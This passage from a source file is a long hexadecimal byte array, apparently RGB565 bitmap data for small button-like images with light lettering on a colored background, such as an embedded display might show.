0X60,0XFE,0X60,0XFE,0X60,0XFE,0X60,0XFE,0X40,0XAC,0X00,0X00,0X00,0X00,0X00,0X29, 0X00,0XF6,0X60,0XFE,0X60,0XFE,0X60,0XFE,0X60,0XFE,0X60,0XFE,0X60,0XFE,0X60,0XFE, 0X60,0XFE,0X60,0XFE,0X60,0XFE,0X60,0XFE,0X60,0XFE,0X60,0XFE,0X60,0XFE,0X60,0XFE, 0X60,0XFE,0X60,0XFE,0X60,0XFE,0X60,0XFE,0X60,0XFE,0X60,0XFE,0X60,0XFE,0X60,0XFE, 0X60,0XFE,0X60,0XFE,0X60,0XFE,0X60,0XFE,0X60,0XFE,0X60,0XFE,0X60,0XFE,0X60,0XFE, 0X60,0XFE,0X00,0XF6,0X00,0X29,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X29,0X80,0XB4, 0X20,0XF6,0X60,0XFE,0X60,0XFE,0X60,0XFE,0X60,0XFE,0X60,0XFE,0X60,0XFE,0X60,0XFE, 0X60,0XFE,0X60,0XFE,0X60,0XFE,0X60,0XFE,0X60,0XFE,0X60,0XFE,0X60,0XFE,0X60,0XFE, 0X60,0XFE,0X60,0XFE,0X60,0XFE,0X60,0XFE,0X60,0XFE,0X60,0XFE,0X60,0XFE,0X60,0XFE, 0X60,0XFE,0X60,0XFE,0X60,0XFE,0X60,0XFE,0X60,0XFE,0X20,0XF6,0X80,0XB4,0X00,0X29, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X82,0X28,0X49,0XB2,0X0C,0XF3,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X0C,0XF3, 0X49,0XB2,0X82,0X28,0X00,0X00,0X00,0X00,0X00,0X00,0X82,0X28,0X0C,0XF3,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X0C,0XF3, 0X82,0X28,0X00,0X00,0X00,0X00,0X28,0XAA,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X28,0XAA,0X00,0X00, 0X00,0X00,0X0C,0XF3,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X0C,0XF3,0X00,0X00,0X00,0X00,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X00,0X00,0X00,0X00,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X00,0X00,0X00,0X00,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X10,0XFC, 0X38,0XFE,0XFF,0XFF,0XFF,0XFF,0XDB,0XFE,0X10,0XFC,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X00,0X00, 0X00,0X00,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0XF7,0XFD,0X14,0XFD,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0XDB,0XFE,0X14,0XFD,0X2C,0XFB, 0X2C,0XFB,0XB2,0XFC,0XFF,0XFF,0X8E,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X55,0XFD, 0X1C,0XFF,0XFF,0XFF,0XFF,0XFF,0XF7,0XFD,0X8E,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X00,0X00,0X00,0X00,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X9A,0XFE,0X55,0XFD, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0XF7,0XFD,0X55,0XFD,0X2C,0XFB,0X2C,0XFB,0X55,0XFD,0XDB,0XFE,0X10,0XFC,0X2C,0XFB, 0X2C,0XFB,0X55,0XFD,0XB2,0XFC,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X00,0X00,0X00,0X00,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X9A,0XFE,0X55,0XFD,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X55,0XFD,0X38,0XFE, 0X2C,0XFB,0X2C,0XFB,0XFF,0XFF,0X10,0XFC,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X00,0X00,0X00,0X00,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X9A,0XFE,0X55,0XFD,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0XF7,0XFD,0X55,0XFD,0X2C,0XFB,0X8E,0XFB, 0XFF,0XFF,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X00,0X00, 0X00,0X00,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X9A,0XFE,0X55,0XFD,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X8E,0XFB,0XFF,0XFF,0XCF,0XFB,0X2C,0XFB,0X10,0XFC,0XFF,0XFF,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X00,0X00,0X00,0X00,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X9A,0XFE,0X55,0XFD, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0XDB,0XFE, 0X96,0XFD,0X2C,0XFB,0X2C,0XFB,0X10,0XFC,0XFF,0XFF,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X00,0X00,0X00,0X00,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X9A,0XFE,0X55,0XFD,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0XDB,0XFE,0X9A,0XFE,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X10,0XFC,0XFF,0XFF,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X00,0X00,0X00,0X00,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X9A,0XFE,0X55,0XFD,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0XDB,0XFE,0XDB,0XFE,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X10,0XFC, 0XFF,0XFF,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X00,0X00, 0X00,0X00,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X9A,0XFE,0X55,0XFD,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0XF7,0XFD,0XDB,0XFE, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X8E,0XFB,0XFF,0XFF,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X00,0X00,0X00,0X00,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X9A,0XFE,0X55,0XFD, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X71,0XFC,0XFF,0XFF,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0XFF,0XFF,0X10,0XFC,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X00,0X00,0X00,0X00,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X9A,0XFE,0X55,0XFD,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0XFF,0XFF,0XB2,0XFC,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X55,0XFD,0XDB,0XFE,0X10,0XFC,0X2C,0XFB,0X2C,0XFB,0X55,0XFD, 0XB2,0XFC,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X00,0X00,0X00,0X00,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0XF7,0XFD,0X14,0XFD,0X2C,0XFB,0X2C,0XFB,0X8E,0XFB,0XFF,0XFF, 0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF7,0XFD,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X55,0XFD,0X1C,0XFF,0XFF,0XFF,0XFF,0XFF,0XF7,0XFD,0X8E,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X00,0X00, 0X00,0X00,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X00,0X00,0X00,0X00,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X00,0X00,0X00,0X00,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X00,0X00,0X00,0X00,0X0C,0XF3,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X0C,0XF3,0X00,0X00, 0X00,0X00,0X28,0XAA,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X28,0XAA,0X00,0X00,0X00,0X00,0X82,0X28, 0X0C,0XF3,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X0C,0XF3,0X82,0X28,0X00,0X00,0X00,0X00,0X00,0X00,0X82,0X28,0X49,0XB2, 0X0C,0XF3,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB, 0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X2C,0XFB,0X0C,0XF3,0X49,0XB2,0X82,0X28, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0XC2,0X18,0X69,0X6B,0X8C,0X94,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0X8C,0X94, 0X69,0X6B,0XC2,0X18,0X00,0X00,0X00,0X00,0X00,0X00,0XC2,0X18,0X8C,0X94,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0X8C,0X94, 0XC2,0X18,0X00,0X00,0X00,0X00,0X48,0X6B,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0X48,0X6B,0X00,0X00, 0X00,0X00,0X8C,0X94,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0X8C,0X94,0X00,0X00,0X00,0X00,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0X00,0X00,0X00,0X00,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0X00,0X00,0X00,0X00,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0X00,0X00, 0X00,0X00,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0X35,0XC6,0X7C,0XEF, 0XFF,0XFF,0XFF,0XFF,0XD8,0XDE,0X70,0XAD,0XCC,0X9C,0XCC,0X9C,0X76,0XCE,0XFF,0XFF, 0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X97,0XD6,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0X97,0XD6, 0X14,0XC6,0XCC,0X9C,0XCC,0X9C,0X14,0XC6,0X7C,0XEF,0XFF,0XFF,0XFF,0XFF,0X97,0XD6, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0X00,0X00,0X00,0X00,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0X35,0XC6,0X3B,0XE7,0X70,0XAD,0XCC,0X9C,0XCC,0X9C, 0X35,0XC6,0XD2,0XBD,0XCC,0X9C,0XCC,0X9C,0X1A,0XE7,0X35,0XC6,0XCC,0X9C,0XCC,0X9C, 